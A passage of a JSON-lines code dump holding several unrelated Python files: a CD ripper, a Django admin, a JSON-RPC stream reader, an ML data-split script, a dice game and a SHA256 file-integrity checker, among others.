@classmethod\n def create(\n cls,\n fn: typing.Callable,\n typevars: TypeVarMapping,\n inner_mapping: typing.Callable[[typing.Any], typing.Any],\n ) -> typing.Callable:\n if isinstance(fn, FunctionReplaceTyping):\n return fn\n typevars_in_scope: typing.FrozenSet[TypeVar] = fn.__scoped_typevars__ # type: ignore\n if not typevars_in_scope:\n return fn\n # TODO: Fix hack\n if \"fib_more\" in str(fn):\n return fn\n\n typevars = HashableMapping(\n {k: v for k, v in typevars.items() if k in typevars_in_scope}\n )\n res = cls(fn, typevars, typevars_in_scope, inner_mapping)\n\n functools.update_wrapper(res, fn)\n res.__annotations__ = {\n k: replace_typevars(typevars, v)\n for k, v in typing_get_type_hints(fn).items()\n }\n\n return res\n\n def __call__(self, *args, **kwargs):\n with NewTypeVarScope():\n with TypeVarScope(*self.typevars_in_scope):\n return self.inner_mapping(self.fn(*args, **kwargs)) # type: ignore\n\n # def __repr__(self):\n # return repr(self.fn)\n\n # def __str__(self):\n # return str(self.fn)\n\n\n@dataclasses.dataclass(unsafe_hash=True)\nclass Identity:\n def __call__(self, a):\n return a\n\n\ndef replace_fn_typevars(\n fn: T,\n typevars: TypeVarMapping,\n inner_mapping: typing.Callable[[T], T] = Identity(),\n) -> T:\n if isinstance(fn, BoundInfer):\n return typing.cast(\n T,\n BoundInfer( # type: ignore\n fn=fn.fn,\n wrapper=fn.wrapper, # type: ignore\n is_classmethod=fn.is_classmethod,\n owner=replace_typevars(typevars, fn.owner),\n ),\n )\n if isinstance(fn, types.FunctionType):\n logger.debug(\"replace_fn_typevars function fn=%s typevars=%s\", fn, typevars)\n # Create new function by replacing typevars in existing function\n return FunctionReplaceTyping.create(fn, typevars, inner_mapping) # type: ignore\n return fn\n\n\ndef get_fn_typevars(fn: object) -> TypeVarMapping:\n if isinstance(fn, BoundInfer):\n return match_types(get_origin_type(fn.owner), fn.owner)\n return {}\n","repo_name":"metadsl/metadsl","sub_path":"metadsl/typing_tools.py","file_name":"typing_tools.py","file_ext":"py","file_size_in_byte":31452,"program_lang":"python","lang":"en","doc_type":"code","stars":97,"dataset":"github-code","pt":"67"} +{"seq_id":"70678950293","text":"# coding: utf-8\nfrom hashlib import md5\n\n__author__ = 'vadim'\n\nclass ResultSet:\n def __init__(self, src_ip, dst_ip, data, file_extension,file_name):\n self.src_ip = src_ip\n self.dst_ip = dst_ip\n self.data = data\n self.file_extension = file_extension\n self.file_name = file_name\n\n def generate_file_name(self, index=None):\n \"\"\"\n Генерация уникального имени файла. Для генерации используется md5 hash.\n Хэш-сумма вычисляется по первым 2048 байтам данных data\n :param index: добавляет индекс в файлу после генерации\n :return: {md5-hash}_{index}.{file_extension}\n \"\"\"\n # Ограничение для получения md5-хэша требуется для больших файлов\n # Значение в 2048 байт выбрано произвольно\n hash = md5(self.data[:2048])\n file_name = hash.hexdigest()\n if index is not None:\n file_name += '_%i' % index\n file_name += self.file_extension\n return file_name\n","repo_name":"vadimlarionov/pcap-parser","sub_path":"parser_package/result_set.py","file_name":"result_set.py","file_ext":"py","file_size_in_byte":1191,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"30252236653","text":"from django.contrib import admin\nfrom django.utils.html import format_html\n\nfrom ordered_model.admin import OrderedModelAdmin\n\nfrom courses.models import CourseLecture, CourseLectureDurationTime\n\n\nclass CourseLectureDurationTimeInline(admin.TabularInline):\n verbose_name = \"Duration time\"\n verbose_name_plural = \"Duration time\"\n model = CourseLectureDurationTime\n can_delete = False\n\n\n@admin.register(CourseLecture)\nclass CourseLectureAdmin(OrderedModelAdmin):\n list_display = [\n \"id\",\n \"title\",\n 'section',\n 'course',\n 'course_image_tag',\n 'order_in_course',\n 'move_up_down_links',\n ]\n\n list_display_links = [\n \"id\", \n \"title\",\n \"section\",\n \"course\",\n \"course_image_tag\",\n ]\n\n fields = [\n \"course_section\",\n \"title\",\n \"description\",\n \"students_finished_count\",\n \"free_opened\",\n ]\n\n readonly_fields = [\n \"students_finished_count\",\n ]\n\n inlines = [\n CourseLectureDurationTimeInline\n ]\n\n def section(self, obj):\n return obj.course_section.title\n\n def course_image_tag(self, obj):\n course = obj.course_section.course_content.course\n return format_html(f'')\n\n def course(self, obj):\n return obj.course_section.course_content.course.title\n\n def order_in_course(self, obj):\n return obj.order + 1\n","repo_name":"3asyPe/astudy","sub_path":"backend/src/courses/admin/lectures.py","file_name":"lectures.py","file_ext":"py","file_size_in_byte":1474,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"21995168671","text":"from setuptools import setup, find_packages\n\nsetup(\n name='wordside',\n version='1.1',\n packages=find_packages(),\n include_package_data=True,\n author='Evgeni Pochchuev',\n author_email='jackio@tuta.io',\n url='https://github.com/jacki0/wordside',\n)\ninstall_requires=[\n 'pymorphy2==0.8'\n]","repo_name":"pchchv/wordside","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"74933151254","text":"from __future__ import annotations\n\nimport inspect\nimport json\nimport random\nfrom importlib import resources\nfrom importlib.metadata import distribution\n\nimport networkx as nx\n\ndiagraph_version = distribution(\"diagraph\").metadata[\"version\"]\n\n\ndef load_from_dist(url: str):\n return load_resource(f\"./assets/dist/{url}\")\n\n\ndef load_resource(resource_filepath: str, pkg=\"diagraph\") -> str:\n ref = resources.files(pkg).joinpath(resource_filepath)\n with ref.open(\"r\") as f:\n return f.read()\n\n\ndef render_repr_html(diagraph):\n G = diagraph.__graph__.__G__\n\n graph = {}\n nodes = []\n links = nx.node_link_data(G)[\"links\"]\n if len(links) == 0:\n for int_key in nx.topological_sort(G):\n fn = diagraph.__graph__.get_node_for_int_key(int_key)\n graph[fn.__name__] = []\n else:\n for link in links:\n source = link.get(\"source\")\n target = link.get(\"target\")\n if graph.get(target) is None:\n graph[target] = []\n graph[target].append(source)\n if len(graph.keys()) == 0:\n raise Exception(\"Empty graph\")\n\n for fn in diagraph.__graph__.get_nodes():\n int_key = str(diagraph.__graph__.get_int_key_for_node(fn))\n node = diagraph[fn]\n node_definition = {\n \"id\": int_key,\n \"label\": fn.__name__,\n \"fn\": inspect.getsource(fn),\n \"prompt\": \"\",\n \"result\": \"\",\n }\n if node.__is_decorated__:\n try:\n node_definition[\"prompt\"] = node.prompt\n except Exception:\n pass\n try:\n node_definition[\"result\"] = node.result\n except Exception:\n pass\n nodes.append(node_definition)\n\n # fn = diagraph.__graph__.get_node_for_int_key(0)\n # graph = json.dumps(graph)\n\n style = load_from_dist(\"style.css\")\n script = load_from_dist(\"diagraph-visualizer.umd.cjs\")\n\n props = json.dumps(\n {\n \"nodes\": nodes,\n \"graph\": graph,\n \"version\": diagraph_version,\n },\n )\n random_number = random.randint(0, 100000000)\n root_id = f\"root-{random_number}\"\n style = (\n \"#\"\n + root_id\n + \"\"\" {\n width: 100%;\n min-height: 600px;\n display: flex;\n align-items: stretch;\n}\n\"\"\"\n + style\n )\n return f\"\"\"\n\n \n\n \n\n
\n \n\n \"\"\"\n\n # \n #
\n # \n # \n #
\n","repo_name":"thekevinscott/Diagraph","sub_path":"packages/python/diagraph/visualization/render_repr_html.py","file_name":"render_repr_html.py","file_ext":"py","file_size_in_byte":2848,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"4103653180","text":"from __future__ import annotations\n\nimport json\nimport os\nimport os.path\nfrom datetime import datetime\nfrom os import PathLike\nfrom pathlib import Path\nfrom subprocess import Popen, PIPE, STDOUT\nfrom typing import Union, Optional, List, Dict\n\nimport pytz\n\nfrom . import cd\nfrom . import cdplayer\nfrom . import tools\nfrom .accuraterip import AccurateRip, AccurateRipConfidence\n\n\nclass AudioRipperException(Exception):\n pass\n\n\n# this class handles the actual ripping from cd to audio file\n# all intermediate files are stored as raw 16-bit signed samples (at 44.1kHz)\nclass AudioRipper:\n COMMANDS = {\n 'cdrdao': Path('/usr/bin/cdrdao'),\n 'icedax': Path('/usr/bin/icedax'),\n 'cdparanoia': Path('/usr/bin/cdparano1ia'),\n 'sox': Path('/usr/bin/sox'),\n 'flac': Path('/usr/bin/flac')\n }\n sox_raw_spec = ['-t', 'raw', '--endian', 'little', '-b16', '-esigned', '-c2', '-r44100']\n sox_wav_spec = ['-t', 'wav', '--endian', 'little', '-b16', '-esigned', '-c2', '-r44100']\n\n def __init__(self, disc : cd.Disc, destdir: PathLike) -> None:\n self.disc: cd.Disc = disc\n self.cdplayer: cdplayer.CDPlayer = disc.cdplayer\n self.destdir: Path = Path(destdir)\n self.wav_file: Optional[Path] = None\n self.flac_file: Optional[Path] = None\n self.rip_date: datetime = datetime.now(pytz.timezone(\"Europe/Amsterdam\")).replace(microsecond=0)\n self.accuraterip_results: Optional[Dict[cd.TrackNr, AccurateRipConfidence]] = None\n\n self.destdir.mkdir(parents=True, exist_ok=True)\n\n def as_json(self) -> str:\n return json.dumps(self.__dict__, indent=4, cls=tools.AudioRipperJSONEncoder)\n\n @property\n def cd(self) -> cdplayer.CDPlayer:\n return self.cdplayer\n\n @property\n def cwd(self) -> Path:\n return self.destdir\n\n def path(self, name: Union[PathLike, str]) -> Path:\n return Path(self.destdir, name)\n\n def rip(self) -> None:\n self.wav_file = self.rip_icedax()\n accuraterip = AccurateRip(self.disc, self.wav_file)\n confidence = accuraterip.find_confidence()\n if confidence is not None:\n for track, conf in [(t, c) for t, c in confidence.items() if c < 10]:\n print(accuraterip.ar_results)\n print(f\"Track {track} failed (confidence is {conf}, retrying\")\n raise AudioRipperException(\"Reripping tracks is not implemented yet\")\n self.accuraterip_results = confidence\n self.flac_file = self.convert_to_flac()\n\n return\n\n def save(self, dest: Path, basename: Path) -> None:\n if not dest.is_dir():\n raise AudioRipperException(f\"Destination '{dir}' for save is not a directory\")\n if list(dest.glob(str(basename)+\"*\")):\n raise AudioRipperException(f\"Destination id '{dest / basename}' already exists\")\n\n name = dest / basename\n self.wav_file.rename(name.with_suffix(\".flac\"))\n with open(name.with_suffix(\".json\"), \"x\") as fp:\n fp.write(self.as_json())\n\n def exec(self, command: str, args: List[str], cwd: Optional[PathLike] = None):\n if cwd is None:\n cwd = self.cwd\n cmd = self.COMMANDS[command]\n process = tools.execcmd(cmd=cmd, args=args, cwd=cwd, show_output=True)\n if process.returncode != 0:\n print(f\"Woops, command '{cmd}' failed:\")\n print(process.stderr)\n process.check_returncode()\n print(process.stdout)\n print(process.stderr)\n\n def rip_icedax(self) -> PathLike:\n output_file = self.path('icedax.wav')\n\n if output_file.exists():\n print(\"Rip exists, skipping\")\n return output_file\n\n args = [\n self.COMMANDS['icedax'],\n '-D', self.cd.device_name,\n '--max', '--no-infofile',\n '--output-format', 'wav',\n '--track', f\"{self.cd.firsttrack}+{self.cd.lasttrack}\",\n output_file\n ]\n\n print(\"Ripping disc using icedax:\")\n\n popen = Popen(args, cwd=self.cwd,\n stdout=PIPE, stderr=STDOUT, encoding='ascii', text=True, bufsize=0)\n\n # produce some fancy output\n current_track = 0\n while popen.poll() is None:\n line = popen.stdout.readline().rstrip()\n\n if current_track > 0:\n if \"%\" in line:\n print(f\"\\rTrack {current_track:-2d}/{self.cd.lasttrack}: {line}\", end=\"\")\n if \"recorded successfully\" in line:\n print()\n\n if line == 'percent_done:' or line.endswith(\"recorded successfully\"):\n current_track += 1\n\n if popen.returncode != 0:\n print(\"Error while ripping, cleaning up\")\n output_file.unlink(missing_ok=True)\n\n return output_file\n\n def convert_to_flac(self) -> PathLike:\n input_file = self.wav_file\n output_file = self.path(\"icedax.flac\")\n\n output_file.unlink(missing_ok=True)\n if output_file.exists():\n print(\"Flac exists, skipping\")\n return output_file\n\n args = [\n self.COMMANDS['flac'],\n \"--no-keep-foreign-metadata\",\n \"-6\",\n \"--output-name=\" + str(output_file),\n input_file\n ]\n\n print(\"Converting sound to flac\")\n\n popen = Popen(args, cwd=self.cwd,\n stdout=PIPE, stderr=STDOUT, encoding='ascii', text=True, bufsize=0)\n\n # produce some fancy output\n # flac produces annoying output, including a non-removable preamble.\n # and a progress indicator that overwrites itself by backspacing over the old text\n # like this:\n # ╰─▶ flac -6 --output-name=icedax.flac -f cdrdao.wav|& xxd\n # 00000000: 0a66 6c61 6320 312e 342e 320a 436f 7079 .flac 1.4.2.Copy\n # 00000010: 7269 6768 7420 2843 2920 3230 3030 2d32 right (C) 2000-2\n # 00000020: 3030 3920 204a 6f73 6820 436f 616c 736f 009 Josh Coalso\n # 00000030: 6e2c 2032 3031 312d 3230 3232 2020 5869 n, 2011-2022 Xi\n # 00000040: 7068 2e4f 7267 2046 6f75 6e64 6174 696f ph.Org Foundatio\n # 00000050: 6e0a 666c 6163 2063 6f6d 6573 2077 6974 n.flac comes wit\n # 00000060: 6820 4142 534f 4c55 5445 4c59 204e 4f20 h ABSOLUTELY NO\n # 00000070: 5741 5252 414e 5459 2e20 2054 6869 7320 WARRANTY. This\n # 00000080: 6973 2066 7265 6520 736f 6674 7761 7265 is free software\n # 00000090: 2c20 616e 6420 796f 7520 6172 650a 7765 , and you are.we\n # 000000a0: 6c63 6f6d 6520 746f 2072 6564 6973 7472 lcome to redistr\n # 000000b0: 6962 7574 6520 6974 2075 6e64 6572 2063 ibute it under c\n # 000000c0: 6572 7461 696e 2063 6f6e 6469 7469 6f6e ertain condition\n # 000000d0: 732e 2020 5479 7065 2060 666c 6163 2720 s. Type `flac'\n # 000000e0: 666f 7220 6465 7461 696c 732e 0a0a 6364 for details...cd\n # 000000f0: 7264 616f 2e77 6176 3a20 3125 2063 6f6d rdao.wav: 1% com\n # 00000100: 706c 6574 652c 2072 6174 696f 3d31 2e30 plete, ratio=1.0\n # 00000110: 3033 0808 0808 0808 0808 0808 0808 0808 03..............\n # 00000120: 0808 0808 0808 0808 0808 3225 2063 6f6d ..........2% com\n # 00000130: 706c 6574 652c 2072 6174 696f 3d31 2e30 plete, ratio=1.0\n #\n # parse this, so we only output \"\\r34% complete\"\n buf = \"\"\n output_enable = False\n while popen.poll() is None:\n # make sure to read less than 1 line per iteration here.\n buf += popen.stdout.read(32)\n\n # remove preamble\n if buf.find(\": \") > 0:\n _, _, buf = buf.partition(\": \")\n output_enable = True\n\n if output_enable:\n # make sure we don't end with backspace, because then the partition won't work\n if buf.rfind(\"\\b\") != len(buf):\n line, _, buf = buf.rpartition(\"\\b\")\n # note that line cannot be multple lines because we read less than a full line per iteration\n if line:\n line = line.strip(\" \\b\")\n print(f\"\\r{line}\", end=\"\", flush=True)\n\n print()\n\n if popen.returncode != 0:\n # if result.returncode != 0:\n print(\"Error while ripping, cleaning up\")\n output_file.unlink(missing_ok=True)\n\n return output_file\n\n def rip_accurate_track(self, track: int) -> PathLike:\n # cdparanoia\n outputfile = Path(f'cdparanoia_{track:02d}.wav')\n self.exec('cdparanoia', [\n '--output-wav', '--force-cdrom-device', self.cd.device_name,\n '--sample-offset', f'{self.cd.offset:d}', f'{track:d}',\n outputfile\n ])\n return outputfile\n\n def convert_to_wav(self) -> PathLike:\n filename = 'cdrdao.wav'\n if os.path.exists(self.path(filename)):\n print(\"Wav exists, skipping\")\n else:\n self.exec('sox',\n self.sox_raw_spec + ['cdrdao.raw'] +\n self.sox_wav_spec + [filename]\n )\n self.wav_file = self.path(filename)\n return self.wav_file\n\n def correct_offset(self):\n # examples:\n # add 294 samples at the start: sox new.wav padded1.wav trim 0 -294s pad 294s 0\n # add 294 samples at the end: sox new.wav padded2.wav trim 294s pad 0 294s\n\n # Positive correction means: drive reads samples too soon, so samples need to be shifted\n # forwards in time\n correction = self.cd.offset\n if correction > 0:\n trim_spec = ['trim', '0', f'-{correction}s', 'pad', f'{correction}s', '0']\n elif correction < 0:\n trim_spec = ['trim', f'{abs(correction)}s', 'pad', '0', f'{correction}s']\n else:\n trim_spec = []\n\n self.exec('sox',\n self.sox_raw_spec + ['cdrdao.raw'] +\n self.sox_raw_spec + ['cdrdao_shifted.raw'] +\n trim_spec\n )\n","repo_name":"baszoetekouw/cdrip","sub_path":"src/voidrip/audioripper.py","file_name":"audioripper.py","file_ext":"py","file_size_in_byte":10106,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"24212702521","text":"\nfrom sklearn.model_selection import train_test_split\nimport torch\nimport torchtext\nfrom torchtext import data\nimport torch.optim as optim\nimport argparse\nimport os\nimport pandas as pd\n\nglove = torchtext.vocab.GloVe(name=\"6B\",dim=100)\n\ndata_path = \"data\"\nsplit = 'data'\ndf = pd.read_csv(os.path.join(data_path, f\"{split}.tsv\"), sep=\"\\t\")\n\ny = df.label\nX = df.text\nX_train, X_test, y_train, y_test = train_test_split(X, y,test_size=0.2,stratify=y)\nX_train, X_val, y_train, y_val = train_test_split(X_train, y_train,test_size=0.2,stratify=y_train)\n\nprint('Training Set')\nprint(y_train.value_counts())\nprint('\\n')\nprint('Validation Set')\nprint(y_val.value_counts())\nprint('\\n')\nprint('Test Set')\nprint(y_test.value_counts())\nprint('\\n')\n\ntrain_df =pd.concat([X_train,y_train],axis=1)\nval_df =pd.concat([X_val,y_val],axis=1)\ntest_df =pd.concat([X_test,y_test],axis=1)\n\nlab_df = train_df[train_df['label'] == 0]\nlab1_df = train_df[train_df['label'] == 1]\nlab_c = lab_df.iloc[0:25]\nlab1_c = lab1_df.iloc[0:25]\noverfit_df = pd.concat([lab_c,lab1_c])\noverfit_df.head()\n\ndf1 =pd.merge(X_train,X_test,how='outer')\ndf1 =pd.merge(df1,X_val,how = 'outer')\nprint('The total number of unique entries:', X.nunique())\nprint('The number of unique values in all three splits: ',df1['text'].nunique())\n\ntrain_df.to_csv(\"data/train.tsv\", sep=\"\\t\", index=False)\nval_df.to_csv(\"data/validation.tsv\", sep=\"\\t\", index=False)\ntest_df.to_csv(\"data/test.tsv\", sep=\"\\t\", index=False)\noverfit_df.to_csv(\"data/overfit.tsv\", sep=\"\\t\", index=False)\n\n\n","repo_name":"gopi-196/Natural-Language-Processing","sub_path":"Subjective\\Objective Sentence Classification Using MLP and CNN/Data Processing/A2P3_2.py","file_name":"A2P3_2.py","file_ext":"py","file_size_in_byte":1518,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"16372183590","text":"import random\n\n\ndef foo(number=None):\n if not number:\n random.seed()\n number = random.randint(1, 3)\n if number == 1:\n raise ZeroDivisionError\n elif number == 2:\n raise ArithmeticError\n else:\n raise AssertionError\n\n\ndef main(number=None):\n try:\n foo(number)\n except ZeroDivisionError:\n print(\"ZeroDivisionError\")\n except ArithmeticError:\n print(\"ArithmeticError\")\n except AssertionError:\n print(\"AssertionError\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"ivaninkv/python_basics","sub_path":"week2/module1/module2_11.py","file_name":"module2_11.py","file_ext":"py","file_size_in_byte":539,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"17585650662","text":"from collections import deque\r\n\r\nn, m = map(int, input().split())\r\npaper = [list(map(int, input().split())) for _ in range(n)]\r\n\r\n# 방문한 위치를 저장하는 visited 리스트\r\nvisited = [[False]*m for _ in range(n)]\r\n\r\n# 방향 벡터 정의\r\ndx = [-1, 1, 0, 0]\r\ndy = [0, 0, -1, 1]\r\n\r\n\r\ndef bfs(x, y):\r\n q = deque()\r\n q.append((x, y))\r\n visited[x][y] = True\r\n count = 1 # 그림의 크기를 세는 변수\r\n\r\n while q:\r\n x, y = q.popleft()\r\n\r\n # 현재 위치에서 상하좌우 탐색\r\n for i in range(4):\r\n nx = x + dx[i]\r\n ny = y + dy[i]\r\n\r\n # 도화지 범위를 벗어난 경우\r\n if nx < 0 or ny < 0 or nx >= n or ny >= m:\r\n continue\r\n\r\n # 이미 방문한 위치이거나 그림이 아닌 경우\r\n if visited[nx][ny] or paper[nx][ny] == 0:\r\n continue\r\n\r\n q.append((nx, ny))\r\n visited[nx][ny] = True\r\n count += 1\r\n\r\n return count\r\n\r\n\r\ncount = 0\r\nmax_size = 0 # 가장 큰 그림의 크기를 저장하는 변수\r\n\r\nfor i in range(n):\r\n for j in range(m):\r\n if not visited[i][j] and paper[i][j] == 1:\r\n count += 1\r\n size = bfs(i, j)\r\n if size > max_size:\r\n max_size = size\r\n\r\nprint(count)\r\nprint(max_size)\r\n","repo_name":"EEDK/StudyBaekJoon","sub_path":"백준/Silver/1926. 그림/그림.py","file_name":"그림.py","file_ext":"py","file_size_in_byte":1348,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"38183583359","text":"import logging\nimport threading\n\ntry:\n import ujson as json\nexcept Exception: # pylint: disable=broad-except\n import json\n\nlog = logging.getLogger(__name__)\n\n\nclass JsonRpcStreamReader(object):\n\n def __init__(self, rfile):\n self._rfile = rfile\n\n def close(self):\n self._rfile.close()\n\n def listen(self, message_consumer):\n \"\"\"Blocking call to listen for messages on the rfile.\n\n Args:\n message_consumer (fn): function that is passed each message as it is read off the socket.\n \"\"\"\n while not self._rfile.closed:\n try:\n request_str = self._read_message()\n except ValueError:\n if self._rfile.closed:\n return\n else:\n log.exception(\"Failed to read from rfile\")\n\n if request_str is None:\n break\n\n try:\n message_consumer(json.loads(request_str.decode('utf-8')))\n except ValueError:\n log.exception(\"Failed to parse JSON message %s\", request_str)\n continue\n\n def _read_message(self):\n \"\"\"Reads the contents of a message.\n\n Returns:\n body of message if parsable else None\n \"\"\"\n line = self._rfile.readline()\n\n if not line:\n return None\n\n content_length = self._content_length(line)\n\n # Blindly consume all header lines\n while line and line.strip():\n line = self._rfile.readline()\n\n if not line:\n return None\n\n # Grab the body\n return self._rfile.read(content_length)\n\n @staticmethod\n def _content_length(line):\n \"\"\"Extract the content length from an input line.\"\"\"\n if line.startswith(b'Content-Length: '):\n _, value = line.split(b'Content-Length: ')\n value = value.strip()\n try:\n return int(value)\n except ValueError:\n raise ValueError(\"Invalid Content-Length header: {}\".format(value))\n\n return None\n\n\nclass JsonRpcStreamWriter(object):\n\n def __init__(self, wfile, **json_dumps_args):\n self._wfile = wfile\n self._wfile_lock = threading.Lock()\n self._json_dumps_args = json_dumps_args\n\n def close(self):\n with self._wfile_lock:\n self._wfile.close()\n\n def write(self, message):\n with self._wfile_lock:\n if self._wfile.closed:\n return\n try:\n body = json.dumps(message, **self._json_dumps_args)\n\n # Ensure we get the byte length, not the character length\n content_length = len(body) if isinstance(body, bytes) else len(body.encode('utf-8'))\n\n response = (\n \"Content-Length: {}\\r\\n\"\n \"Content-Type: application/vscode-jsonrpc; charset=utf8\\r\\n\\r\\n\"\n \"{}\".format(content_length, body)\n )\n\n self._wfile.write(response.encode('utf-8'))\n self._wfile.flush()\n except Exception: # pylint: disable=broad-except\n log.exception(\"Failed to write message to output file %s\", message)\n","repo_name":"komeilkma/LHC-monitoring-control-system","sub_path":"src/streams.py","file_name":"streams.py","file_ext":"py","file_size_in_byte":3234,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"67"} +{"seq_id":"4580302423","text":"\"\"\"add publictaion producer id index\n\nRevision ID: afdac32d3727\nRevises: f2d86f822460\nCreate Date: 2020-03-19 17:33:08.530519\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = \"afdac32d3727\"\ndown_revision = \"f2d86f822460\"\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n op.create_index(\n \"ik_publication_producer_id\", \"publication\", [\"producer_id\", \"published_at\"]\n )\n\n\ndef downgrade():\n op.drop_index(\"ik_publication_producer_id\", table_name=\"publication\")\n","repo_name":"disinfoRG/ArticleParser","sub_path":"migrations/versions/afdac32d3727_add_publictaion_producer_id_index.py","file_name":"afdac32d3727_add_publictaion_producer_id_index.py","file_ext":"py","file_size_in_byte":539,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"67"} +{"seq_id":"3213803938","text":"\n# Name : Hongju (Eugene) Shin\n# Date : 30 Sep 2021\n# App Name : Dice Bet\n# App Description: Game that players must guess the result of 2 dice\n\nfrom os import system, truncate\nimport random # Allow us to generate random numbers\n\n# Set the console title\nsystem(\"title Dice Bet - Hongju(Eugene) Shin\")\n\n# Contants\nMIN_BET, MAX_BET = 2, 12\nMIN_ROLL, MAX_ROLL = 1, 6\n\n# Ask the user to place a bet\nbet = input(f\"Place your bet between {MIN_BET} and {MAX_BET}: \")\n\n# Try to convert from string to integer\ntry:\n bet = int(bet)\n numeric = True # Able to convert\nexcept:\n numeric = False # Unable to convert\n\n# If the bet is not numeric, then print an error\nif not numeric:\n print(\"Error - Bet must be numeric\")\n\n# If the bet is not in the valid range, then print an error\n# and - Both condition must be true\n# or - just need one of the condition to be true\nelif MIN_BET > bet or bet > MAX_BET:\n print(f\"Error - Bet must be between {MIN_BET} and {MAX_BET}\")\n\n# Valid bet - we can play now\nelse:\n print(\"Rolling dice !\")\n # Generate two random numbers !\n dice_one = random.randint(MIN_ROLL, MAX_ROLL)\n dice_two = random.randint(MIN_ROLL, MAX_ROLL)\n\n # Add the dice result and store the result in a variable\n outcome = dice_one + dice_two\n\n # Print the bet and the dice result\n print(f\"Your bet: {bet}\")\n print(f\"Dice Result: {dice_one} + {dice_two} = {outcome}\")\n\n # Decide if the player wins or loses\n # Player guesses the number, print \"you WIN\" if the bet is right, print \"You lose\" in else cases\n print(\"You WIN! :D\") if bet == outcome else print(\"You lose :(\")\n\n# Exit prompt\ninput(\"Press [Enter] to exit\")\n","repo_name":"Eugene2077/Python","sub_path":"PROG1205/Ice04_Numeric_String_Data.py","file_name":"Ice04_Numeric_String_Data.py","file_ext":"py","file_size_in_byte":1656,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"26328166800","text":"# April 16th 2017, this source code is public domain.\r\n# Augusto Vera, Monterrey, NL, México.\r\n# @augustweet, averaguilar@outlook.com.\r\n\r\nimport sys # This script's command line interface\r\nimport csv # CSV manipulation\r\nimport subprocess # Calling external executables with command line\r\nimport configparser # Module to read from ini files ver. < 3.0\r\nimport glob # Module to read the folder and filenames\r\nimport hashlib # MD5 hash library\r\nimport time # Date and Time module\r\nimport os.path # Pathnames funcions module\r\nfrom xml.etree import ElementTree as elTree\r\n\r\n\r\ndef mainGenerateHashes(pathToRead):\r\n\r\n countFiles, xmlDBFile, logFileName = 0, 's3curefiledb.xml', 's3curefilelog.csv'\r\n \r\n writeToLog(logFileName, '>>> HASH DB CREATION STARTED: '+ pathToRead)\r\n #Read the folder structure and save in XML Database\r\n root = elTree.Element('AllItems') # create the element Allitems for XML root and pass it to the created tree\r\n tree = elTree.ElementTree(root)\r\n BLOCKSIZE = 65536 # Block size to read in case of a large file.\r\n for fileName in glob.iglob(pathToRead + '**\\*.*', recursive=True): \r\n hasher = hashlib.sha256()\r\n with open(fileName, 'rb') as afile:\r\n buf = afile.read(BLOCKSIZE)\r\n while len(buf) > 0: # as long as a block was read\r\n hasher.update(buf)\r\n buf = afile.read(BLOCKSIZE) \r\n print(hasher.hexdigest())\r\n root.append(dict_to_elem({'filename':fileName, 'SHA256hash': hasher.hexdigest()}))\r\n countFiles += 1\r\n # use last row of XML to store the base path and total number of files hashed\r\n root.append(dict_to_elem({'basepath':pathToRead, 'totalfiles': str(countFiles)}))\r\n # Write the XML Database with all the filenames and hashes extracted\r\n with open(xmlDBFile, 'w', encoding='utf-8') as file:\r\n tree.write(file, encoding='unicode')\r\n writeToLog(logFileName, '>>> HASHDB CREATION FINISHED total files hashed: ' + str(countFiles))\r\n\r\n\r\ndef mainVerify():\r\n logFileName, xmlFileName = 's3curefilelog.csv', 's3curefiledb.xml'\r\n\r\n # Generate the tree of XML in memory\r\n dom = elTree.parse(xmlFileName)\r\n # pulls all the FILEITEMs under the root along with all the subelements: filename and SHA256hash\r\n fileItems, totalFilesInDB, verifyPath = dom.findall('FILEITEM'), dom.findtext(\"FILEITEM/totalfiles\"), dom.findtext(\"FILEITEM/basepath\")\r\n totalFilesVerified, filesMissing = 0, 0\r\n #verifyPath = dom.findtext(\"FILEITEM/basepath\") #<<<--- Extract the entire path and filename\r\n writeToLog(logFileName, '>>> HASH VERIFICATION STARTED ' + verifyPath)\r\n print(\">>>> \", verifyPath) \r\n BLOCKSIZE = 65536 # Block size to read in case of a large file.\r\n # Next for block: traverse 1 by 1 all the FILEITEMs until len -1\r\n # because the last FILEITEM is the base path, and file counter.\r\n for fileItemsIndex in range(0,len(fileItems)-1): \r\n # then for every FILEITEM in turn, extract the filename frpm XML DB and the paired SHA256hash\r\n evalList = []\r\n for chld in fileItems[fileItemsIndex]: \r\n evalList.append(chld.text)\r\n # print('File: ' + files[fil].text, ' Hash: ', hashes[fil].text)\r\n print('evalList: ', evalList)\r\n hasher = hashlib.sha256()\r\n if os.path.isfile(evalList[0]):\r\n with open(evalList[0], 'rb') as afile: # open the file in the database FILEITEM/filename for binary read\r\n buf = afile.read(BLOCKSIZE)\r\n while len(buf) > 0: # as long as a block was read\r\n hasher.update(buf)\r\n buf = afile.read(BLOCKSIZE)\r\n hashFromFile = hasher.hexdigest() # Generate the SHA256 file's value\r\n if hashFromFile != evalList[1]:\r\n logmsg = \"* WARNING 01 * \" + evalList[0] + ' hash: ' + hashFromFile + ' db hash: ' + evalList[1]\r\n else:\r\n logmsg = 'file OK ' + evalList[0]\r\n totalFilesVerified += 1\r\n else:\r\n logmsg = '* WARNING 02 * the file < ' + evalList[0] + ' > in database is not present'\r\n filesMissing += 1\r\n writeToLog(logFileName, logmsg)\r\n 